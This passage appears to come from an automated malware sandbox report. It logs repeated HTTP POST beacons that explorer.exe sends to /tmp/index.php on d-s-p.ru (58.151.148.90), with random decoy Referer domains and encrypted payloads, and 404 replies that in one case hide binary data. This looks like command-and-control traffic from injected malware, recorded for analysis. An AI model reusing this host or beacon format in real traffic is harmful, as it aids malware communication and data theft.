                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                53192.168.2.45006058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:30.951487064 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://visknbdtdhq.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 229
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:30.951513052 CET229OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 39 6b 2c 90 f5 76 0b 75 45 3d e4 f1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[9k,vuE=#jhGzli.IfrbWsUvY,L+I]KlLEuW^M^[*[EzmKm_Td
                                                                                                                                                                                Dec 30, 2024 19:45:32.674526930 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:32 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                54192.168.2.45006158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:32.687740088 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://iasmrrglydiueqr.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 156
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:32.687762022 CET156OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3e 6b 2c 90 f5 76 0b 75 50 0b d5 a4
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[>k,vuPTR@UpfXlh^!;MocVarB6M
                                                                                                                                                                                Dec 30, 2024 19:45:34.174436092 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:33 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                55192.168.2.45006258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:34.189436913 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://xhjqltphdtwpxuw.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 160
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:34.189475060 CET160OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3f 6b 2c 90 f5 76 0b 75 43 00 ef a2
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[?k,vuCNzbH=ZrHI5=<L&Sh[32U~/*E
                                                                                                                                                                                Dec 30, 2024 19:45:35.675649881 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:35 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                56192.168.2.45006358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:35.687838078 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://aqewaciknwcref.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:35.687865973 CET134OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3c 6b 2c 90 f5 76 0b 75 27 09 fc ee
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[<k,vu'8r8ve3qeSl\ IFd
                                                                                                                                                                                Dec 30, 2024 19:45:37.141829967 CET189INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:36 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1e 7a 47 f0 39 18 f2 f9 09 fc 8c e5 e5 14 99 3b df e9 20 42 18 c2 8f 97 cb
                                                                                                                                                                                Data Ascii: #\6zG9; B


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                57192.168.2.45006558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:39.376744986 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://newmvklahrrrgqt.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:39.376770973 CET175OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 3c 6b 2c 90 f4 76 0b 75 47 32 a2 83
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA ,[<k,vuG2TL@m"jXVH@Ycd#r=/BIK?0!y_8Z*64nH^
                                                                                                                                                                                Dec 30, 2024 19:45:40.839365959 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                58192.168.2.45006658.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:40.853508949 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://plkttxwuhrfxb.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 141
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:40.853539944 CET141OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 3d 6b 2c 90 f5 76 0b 75 20 1e d0 f3
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[=k,vu -_aW(@s<o%4YA-(#@
                                                                                                                                                                                Dec 30, 2024 19:45:42.293144941 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:41 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                59192.168.2.45006858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:42.307691097 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jhajwwseppqky.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 224
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:42.307706118 CET224OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 32 6b 2c 90 f5 76 0b 75 6f 17 d7 9c
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[2k,vuo4m+OKSy~NL/i_POADU,WmMO[[ly(C=XD9%,]9wk@(l
                                                                                                                                                                                Dec 30, 2024 19:45:43.757122040 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:43 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                60192.168.2.45006958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:43.834738970 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://dltxnhcbkmo.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 235
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:43.834769964 CET235OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 33 6b 2c 90 f5 76 0b 75 5a 08 c5 a4
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[3k,vuZo@Oy7KIR<=e\+I=`((<KkTVbF&<-j5Biw/48;/2L~/t}G+.zN
                                                                                                                                                                                Dec 30, 2024 19:45:45.285413980 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:44 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                61192.168.2.45007058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:45.692699909 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://hhxuaiudkfar.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 144
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:45.692713976 CET144OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 30 6b 2c 90 f5 76 0b 75 75 4f be e9
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[0k,vuuOoDzHxB^)%^m}>VL)&P)
                                                                                                                                                                                Dec 30, 2024 19:45:47.149158001 CET186INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:46 GMT
